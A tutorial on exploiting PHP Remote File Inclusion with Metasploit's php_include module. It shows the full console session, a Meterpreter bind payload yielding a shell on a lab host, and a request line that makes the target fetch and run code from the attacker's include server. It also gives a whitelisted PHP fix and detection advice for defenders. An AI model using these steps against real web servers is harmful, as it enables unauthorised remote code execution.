The Internet is littered with poorly coded web applications, and new vulnerabilities in them are disclosed daily. One of the more critical classes is Remote File Inclusion (RFI): an application passes attacker-controlled input to include() or require(), so PHP code of the attacker's choosing, hosted on a server the attacker controls, is fetched and executed by the vulnerable site. For a URL to be includable in this way the target's PHP must allow it (allow_url_include on PHP 5.2 and later, allow_url_fopen alone on older releases), which is why the same bug is not always exploitable remotely. Metasploit recently added not only a php_include exploit module but also a PHP Meterpreter payload. The php_include module is very versatile: it is not tied to any one product and can be used against any number of vulnerable web applications.
In order to make use of the file inclusion exploit module, you will need to know the exact URI of the vulnerable script and the name of the parameter that reaches include(). Loading the module in Metasploit, we can see a great number of options available to us.
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > show options

Module options:

   Name      Current Setting                                             Required  Description
   ----      ---------------                                             --------  -----------
   PATH      /                                                           yes       The base directory to prepend to the URL to try
   PHPRFIDB  /opt/metasploit3/msf3/data/exploits/php/rfi-locations.dat   no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI                                                                no        The URI to request, with the include parameter changed to XXpathXX
   Proxies                                                               no        Use a proxy chain
   RHOST                                                                 yes       The target address
   RPORT     80                                                          yes       The target port
   SRVHOST   0.0.0.0                                                     yes       The local host to listen on.
   SRVPORT   8080                                                        yes       The local port to listen on.
   URIPATH                                                               no        The URI to use for this exploit (default is random)
   VHOST                                                                 no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic
The most critical option to set in this particular module is PHPURI, the exact path to the vulnerable inclusion point. Where we would normally supply the URL of our own PHP shell as the parameter value, we put the placeholder text "XXpathXX" instead; Metasploit substitutes the URL of the include server it starts on SRVHOST:SRVPORT (with a random URIPATH unless one is set) and attacks that point on the site. The target therefore has to be able to reach that listener, since it is the vulnerable site, not our console, that fetches the payload.
msf exploit(php_include) > set PHPURI /rfi_me.php?path=XXpathXX
PHPURI => /rfi_me.php?path=XXpathXX
msf exploit(php_include) > set RHOST 192.168.1.150
RHOST => 192.168.1.150
In order to further show off the versatility of Metasploit, we will use the PHP Meterpreter payload.
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ehgqo4
[*] Local IP: http://192.168.1.101:8080/ehgqo4
[*] PHP include server started.
[*] Sending stage (29382 bytes) to 192.168.1.150
[*] Meterpreter session 1 opened (192.168.1.101:56931 -> 192.168.1.150:4444) at 2010-08-21 14:35:51 -0600

meterpreter > sysinfo
Computer: V-XPSP2-SPLOIT-
OS      : Windows NT V-XPSP2-SPLOIT- 5.1 build 2600 (Windows XP Professional Service Pack 2) i586
meterpreter >
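To make the target concrete, the following shows what a page like the rfi_me.php that PHPURI points at typically looks like, with the vulnerable include beside a hardened replacement. This is an added example written for this page, not code from the page or from Metasploit: the file name rfi_me.php and the parameter name path are taken from the PHPURI set above, and the page list and directory layout are assumed for illustration.

```php
<?php
// Added example (not from the page or from Metasploit). rfi_me.php is the
// file name and "path" the parameter name used in the PHPURI set above; the
// page list and the pages/ directory below are assumed for illustration.

// --- Vulnerable form: what php_include exploits ---
// The include parameter reaches include() untouched. With allow_url_include
// enabled (PHP 5.2+; on older PHP allow_url_fopen alone suffices), a request
// such as
//   GET /rfi_me.php?path=http://192.168.1.101:8080/ehgqo4
// makes the web server fetch the module's stager from the include server and
// execute it as the web server's user.
//
//   include($_GET['path']);
//
// --- Hardened form: the parameter selects a whitelist entry, never a path ---
$pages = array(
    'home'    => 'home.php',
    'contact' => 'contact.php',
);
$key = isset($_GET['path']) ? $_GET['path'] : 'home';

if (!array_key_exists($key, $pages)) {
    // Anything that is not a known key (a URL, "../", a null byte) is refused
    // before it gets anywhere near include().
    header('HTTP/1.0 404 Not Found');
    exit('unknown page');
}

// Only the whitelisted basename is included, and only from the local pages
// directory next to this script.
include dirname(__FILE__) . '/pages/' . $pages[$key];
```

Whitelisting is the fix; setting allow_url_include = Off in php.ini is defense in depth that stops remote inclusion even where a lookup like this is missing. For defenders, the attempt is easy to spot in the web server access log: the include parameter carries an absolute URL (the "Local IP" URL the module prints above) rather than a page name.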
Just like that, a whole new avenue of attack is opened up using Metasploit. Keep in mind that the resulting session is a PHP Meterpreter running inside the web server's PHP interpreter, so it has the privileges of the web server process, not of an interactive user, and it does not survive a restart of that process.